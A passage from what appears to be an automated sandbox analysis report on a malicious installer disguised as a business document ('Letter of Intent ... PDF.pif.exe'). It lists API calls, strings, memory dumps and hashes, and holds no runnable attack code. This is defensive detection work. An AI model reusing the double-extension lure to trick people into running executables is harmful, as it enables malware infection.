                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                      • DrawTextW.USER32(00000000,00433EA0,000000FF,00000010,00000820), ref: 00401156
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                      • String ID: F
                                                                                      • API String ID: 941294808-1304234792
                                                                                      • Opcode ID: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                                                      • Instruction ID: f1b70214e96eb8bec3146c709be0bbd1f29e4b49e587d4bf0c97a3ec82ce1e67
                                                                                      • Opcode Fuzzy Hash: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                                                      • Instruction Fuzzy Hash: 00417C71400209AFCB058FA5DE459BF7BB9FF44315F00802EF591AA1A0C778EA54DFA4
                                                                                      Function 00402C15 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 40timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C33
                                                                                      • MulDiv.KERNEL32(000D4D30,00000064,000D4F34), ref: 00402C5E
                                                                                      • wsprintfW.USER32 ref: 00402C6E
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402C7E
                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402C90
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                      • String ID: 0M$4O$verifying installer: %d%%
                                                                                      • API String ID: 1451636040-1775721334
                                                                                      • Opcode ID: 2adaee7f08b790a47a5c37bc0b59c1f8a60a08f948b502380a8ffb43cce8331f
                                                                                      • Instruction ID: fc2375c20bf1a940e442d42f67f4bd9350dc1e6ed8ae84fb9db5d2f1b0513ae1
                                                                                      • Opcode Fuzzy Hash: 2adaee7f08b790a47a5c37bc0b59c1f8a60a08f948b502380a8ffb43cce8331f
                                                                                      • Instruction Fuzzy Hash: 28014F70640208BBEF24AF61DD49BEE3B69FB04309F008439FA06A91D0DBB89555CF59
                                                                                      Function 1000228E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134memorystringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?), ref: 10002334
                                                                                      • GlobalAlloc.KERNEL32(00000040,00000010), ref: 10002355
                                                                                      • CLSIDFromString.OLE32(?,00000000), ref: 10002362
                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 10002380
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 1000239B
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100023BD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1962777342.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1962748581.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1962799990.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1962840643.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
                                                                                      • String ID: @Hmu
                                                                                      • API String ID: 3579998418-887474944
                                                                                      • Opcode ID: 0bd45a36e3cf99e0ea36bafafcae9cc199b85f388ee9b7374409e80a5249356b
                                                                                      • Instruction ID: 92ad864d7eaf777a3729ef1fd9657dd0a0a37f05fa24005ae91eac6ed31fbb47
                                                                                      • Opcode Fuzzy Hash: 0bd45a36e3cf99e0ea36bafafcae9cc199b85f388ee9b7374409e80a5249356b
                                                                                      • Instruction Fuzzy Hash: F0418EB0504302EFF724DF649C84A6BB7E8FB443D0B11892EFA46C6199DB34AE44DB65
                                                                                      Function 00405FDA Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 0040603D
                                                                                      • CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                                                      • CharNextW.USER32(?,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406051
                                                                                      • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406064
                                                                                      Strings
                                                                                      • "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe", xrefs: 0040601E
                                                                                      • *?|<>/":, xrefs: 0040602C
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405FDB, 00405FE0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$Prev
                                                                                      • String ID: "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 589700163-2974516326
                                                                                      • Opcode ID: 73afb7676350ec278b66049aa62252973a0582d31a7c1b28115d42195e1f2e0a
                                                                                      • Instruction ID: fcf87bb4fcb389795acbe35438f6f12f46fcdf00a5008526b505f25df9ba4f2d
                                                                                      • Opcode Fuzzy Hash: 73afb7676350ec278b66049aa62252973a0582d31a7c1b28115d42195e1f2e0a
                                                                                      • Instruction Fuzzy Hash: B511B62684061299DB307B149C40B7763B8EF95760F51803FED8A732C0E77C5C9297AD
                                                                                      Function 004024EC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54filestringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000400,?,?,00000021), ref: 0040252D
                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000400,?,?,00000021), ref: 00402534
                                                                                      • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402566
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                      • String ID: 8$C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp$C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll
                                                                                      • API String ID: 1453599865-890437612
                                                                                      • Opcode ID: 7f78652b3f9e30db941b6587a4f94fd1b252cbbd17b2e2df595ff4e6b2ebf496
                                                                                      • Instruction ID: 735716144e4411cb43a0d30ab2875379506436d26c05ff50a3a47e8288d67bee
                                                                                      • Opcode Fuzzy Hash: 7f78652b3f9e30db941b6587a4f94fd1b252cbbd17b2e2df595ff4e6b2ebf496
                                                                                      • Instruction Fuzzy Hash: 62019271A44604FED700ABB19E4DEAF7668EF5031AF20053BB102B60D1D6FC4D919A6D
                                                                                      Function 00403FFC Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404019
                                                                                      • GetSysColor.USER32(00000000), ref: 00404035
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00404041
                                                                                      • SetBkMode.GDI32(?,?), ref: 0040404D
                                                                                      • GetSysColor.USER32(?), ref: 00404060
                                                                                      • SetBkColor.GDI32(?,?), ref: 00404070
                                                                                      • DeleteObject.GDI32(?), ref: 0040408A
                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404094
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2320649405-0
                                                                                      • Opcode ID: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                                                      • Instruction ID: 0ac1a71073e56fec278c78bb8edfd769e40e3e7d0c6ffac740e8a400aad481d4
                                                                                      • Opcode Fuzzy Hash: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                                                      • Instruction Fuzzy Hash: 7D2142B1500704ABC7319F68DE48B5B7BF8AF80714F04892DEA96B22A1D738E904CB54
                                                                                      Function 10002430 Relevance: 10.6, APIs: 7, Instructions: 110COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • wsprintfW.USER32 ref: 10002484
                                                                                      • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,10001875,00000000), ref: 10002498
                                                                                        • Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,74DEFFC0,100011AA,?,00000000), ref: 1000131E
                                                                                      • GlobalFree.KERNEL32(?), ref: 10002505
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 1000252E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1962777342.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1962748581.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1962799990.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1962840643.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeGlobal$FromStringlstrcpywsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2435812281-0
                                                                                      • Opcode ID: bb9e9b395051b3fca634c9c67a90cb730b3747ff24aa199545dded541c7a2836
                                                                                      • Instruction ID: f64b64ae4b2db59ab97b7ed59bafad1354160bd237cc2a2c65f80b4fe5cf6c60
                                                                                      • Opcode Fuzzy Hash: bb9e9b395051b3fca634c9c67a90cb730b3747ff24aa199545dded541c7a2836
                                                                                      • Instruction Fuzzy Hash: A931EFB1509616EFFA22CFA4CCD492BB7BCFB043D17224919FA429216DCB319C54DB24
                                                                                      Function 0040274B Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 0040279F
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 004027BB
                                                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 004027F4
                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402806
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040280D
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402825
                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402839
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3294113728-0
                                                                                      • Opcode ID: ec19c0cd5bc519fbb29dc177204be171099b3653b359ab9f5decef06c1aeeacd
                                                                                      • Instruction ID: 2d0112b2776dca8d717dfd9e18d313b89dca9e7a3efaaf21f9fdf9ae57e92bf3
                                                                                      • Opcode Fuzzy Hash: ec19c0cd5bc519fbb29dc177204be171099b3653b359ab9f5decef06c1aeeacd
                                                                                      • Instruction Fuzzy Hash: CE317C72800128BBCF116FA5CE499AE7A79EF09364F10423AF521762E0CB794D419BA8
                                                                                      Function 004048C4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004048DF
                                                                                      • GetMessagePos.USER32 ref: 004048E7
                                                                                      • ScreenToClient.USER32(?,?), ref: 00404901
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404913
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404939
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Send$ClientScreen
                                                                                      • String ID: f
                                                                                      • API String ID: 41195575-1993550816
                                                                                      • Opcode ID: 8022016cd060c827d0bdc105967e00620e8417d97f69c1817adc8455638bf95d
                                                                                      • Instruction ID: b2acda07281727c86be124b4dee47d1cf8a7ad48e0f381a449079fc6aa512a42
                                                                                      • Opcode Fuzzy Hash: 8022016cd060c827d0bdc105967e00620e8417d97f69c1817adc8455638bf95d
                                                                                      • Instruction Fuzzy Hash: 6F014C71900219BADB10DBA4DD85BFFBBBCAF59711F10012ABB50B61D0D6B499018BA4
                                                                                      Function 00401D41 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDC.USER32(?), ref: 00401D44
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                      • CreateFontIndirectW.GDI32(0040CD80), ref: 00401DBC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                      • String ID: Times New Roman
                                                                                      • API String ID: 3808545654-927190056
                                                                                      • Opcode ID: 1135941911433aa1456fa73da62822fc59eae25dd4671b135b33c63ab7780ad9
                                                                                      • Instruction ID: ac5daf38e842c3ef37672eab1df37869b96295c9a8c7d69064dded374e835ef9
                                                                                      • Opcode Fuzzy Hash: 1135941911433aa1456fa73da62822fc59eae25dd4671b135b33c63ab7780ad9
                                                                                      • Instruction Fuzzy Hash: 1B016D35544640EFEB016BB0AF4AB9A3FB4EF25305F144579F545B62E2CA78040A9B2D
                                                                                      Function 100018CA Relevance: 7.7, APIs: 5, Instructions: 190COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                        • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001931
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001AC2
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001AC7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1962777342.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1962748581.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1962799990.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1962840643.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeGlobal$lstrcpy
                                                                                      • String ID:
                                                                                      • API String ID: 176019282-0
                                                                                      • Opcode ID: c22ba43a18e4d9f744f6e075eadf9e9a5255e54f0eba7ecd37738f721cb55e58
                                                                                      • Instruction ID: e766759d7bb1ff2ecdb10e3212f1feb1bfb1f11c96232c97993d4d3884186bff
                                                                                      • Opcode Fuzzy Hash: c22ba43a18e4d9f744f6e075eadf9e9a5255e54f0eba7ecd37738f721cb55e58
                                                                                      • Instruction Fuzzy Hash: BE51F736F0511AEAFB11DFA4C8815EDB7F5EB463D0B12415AE804A311CD774AF809B93
                                                                                      Function 10001620 Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,1000214E,?,00000808), ref: 10001638
                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,1000214E,?,00000808), ref: 1000163F
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,1000214E,?,00000808), ref: 10001653
                                                                                      • GetProcAddress.KERNEL32(1000214E,00000000), ref: 1000165A
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001663
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1962777342.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1962748581.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1962799990.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1962840643.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
